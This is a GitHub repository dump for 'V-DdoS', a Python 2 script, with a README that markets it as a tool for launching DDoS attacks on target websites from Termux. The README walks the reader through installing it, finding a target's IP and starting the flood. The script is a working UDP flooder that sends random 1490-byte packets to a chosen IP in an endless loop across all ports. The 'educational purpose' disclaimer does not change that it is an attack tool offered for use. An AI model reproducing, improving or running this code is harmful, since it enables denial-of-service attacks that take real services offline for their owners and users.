├── LICENSE ├── README.md └── V-DdoS.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Mr. BL4ZE 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # V-DdoS

What is V-DdoS tool?

2 |
3 |

Distributed Denial Of Service (DDoS) attacks are a subclass of denial of service (DoS) attacks. A DDoS attack involves multiple connected online devices, collectively known as a botnet, which are used to overwhelm a target website with fake traffic.

4 | 5 |

This is a python coded tool for ddos attacks.. you can easily give ddos attacks in your target websites with `Termux` in your Android Device!! Just Follow The Steps And Setup Your Tool!! ( Scroll up for more info) 6 |
7 |

!!Warning!!

8 | 9 | `Note: THIS TOOL IS JUST ONLY FOR EDUCATIONAL PURPOSE..GIVING DDOS ATTACKs WITHOUT SITE OWNER'S PERMISSION IS ILLEGAL.. SO USE IT AT YOUR OWN RISK.. WE'LL BE NOT RESPONSIBLE FOR ANY TYPES OF MISISSUES!!!` 10 | 11 |

How To Install V-DdoS In Termux

12 | 13 |

The Tool Installation Process Is Very Easy.. Just Open Your Termux & Type This Provided Commands!!

14 | 15 | - $ `apt update && apt upgrade` 16 | - $ `pkg install python` 17 | - $ `pkg install python2` 18 | - $ `pkg install git` 19 | - $ `pkg install figlet` 20 | - $ `git clone https://www.github.com/T34mV18rs/V-DdoS.git` 21 | - $ `cd V-DdoS` 22 | - $ `chmod +x V-DdoS.py` 23 | - $ `python2 V-DdoS.py` 24 | 25 |

To Run

26 | 27 | - $ `cd V-DdoS` 28 | - $ `python2 V-DdoS.py` 29 | 30 |

Your Tool Install & Setup Done!!..Now Go To Google & Search`Website IP Finder`Now Open The 1st Wesite & Place Your Target Website Url e.g. www.biribaba.com..

31 | 32 |

After Getting The Website IP , Copy The IP & Come To The Termux.. Now Paste The Target Website IP On `Ip Target:` & Give The Port Number `8080`

33 | 34 |

Booom!! Your Ddos Attack Had Been Started...

35 |
36 |

About Us

37 | 38 | 39 | 40 |

T34m V18rs ( Team Virus ) is a Bangladeshi FB Spamming & Termux Hacker Group..We make working tools for termux..You can reach us by visiting this links.. Thank You So Much For Using Our Tool(s)

41 | 42 |

Connect With Us:

43 | 44 | ``(Tap To Redirect)`` 45 | 46 | [![Github](https://img.shields.io/badge/Facebook-FBGroup-blue?style=for-the-badge&logo=facebook)](https://facebook.com/groups/mohinhossen) 47 | [![Github](https://img.shields.io/badge/Facebook-FBPAGE-blue?style=for-the-badge&logo=facebook)](https://facebook.com/TeamVirusOfficial) 48 | [![Github](https://img.shields.io/badge/TELEGRAM-TgGroup-orange?style=for-the-badge&logo=telegram)](https://t.me/Crackerspace) 49 | 50 |

THANKS FOR USING OUR TOOL

51 | 52 | ``©T34mV18rs`` 53 | 54 | -------------------------------------------------------------------------------- /V-DdoS.py: -------------------------------------------------------------------------------- 1 | print ("\033[91m") 2 | import sys 3 | import os 4 | import time 5 | import socket 6 | import random 7 | #Code Time 8 | from datetime import datetime 9 | now = datetime.now() 10 | hour = now.hour 11 | minute = now.minute 12 | day = now.day 13 | month = now.month 14 | year = now.year 15 | 16 | ############## 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 18 | bytes = random._urandom(1490) 19 | ############# 20 | 21 | os.system("clear") 22 | os.system("figlet V-DdoS") 23 | print 24 | print "Coded By : Mr.BL4Z3" 25 | print "Author : T34m V18rs" 26 | print "Github : github.com/T34mV18rs" 27 | print "Fb Page : facebook.com/TeamVirusOfficial" 28 | print "FB Group : facebook.com/groups/mohinhossen" 29 | print "Telegram : t.me/Crackerspace" 30 | print "Join Cracker Space TG Group To Get Premium Apk(s) Free" 31 | print "Note- This Tool An Illegal Tool & It's Only For Educational Purpose.. Use It At Your Own Risk,We'll Be Not Responsible For Kind Of Problems" 32 | print 33 | ip = raw_input("IP Target : ") 34 | port = input("Port : ") 35 | os.system("clear") 36 | print("\033[93m") 37 | os.system("figlet DdoS Attack") 38 | print("Team : T34m V18rs") 39 | print ("\033[92m") 40 | print "[ ] 0% " 41 | time.sleep(5) 42 | print "[===== ] 25%" 43 | time.sleep(5) 44 | print "[========== ] 50%" 45 | time.sleep(5) 46 | print "[=============== ] 75%" 47 | time.sleep(5) 48 | print "[====================] 100%" 49 | time.sleep(3) 50 | sent = 0 51 | while True: 52 | sock.sendto(bytes, (ip,port)) 53 | sent = sent + 1 54 | port = port + 1 55 | print "Sent %s packet to %s throught port:%s"%(sent,ip,port) 56 | if port == 65534: 57 | port = 1 58 | 59 | --------------------------------------------------------------------------------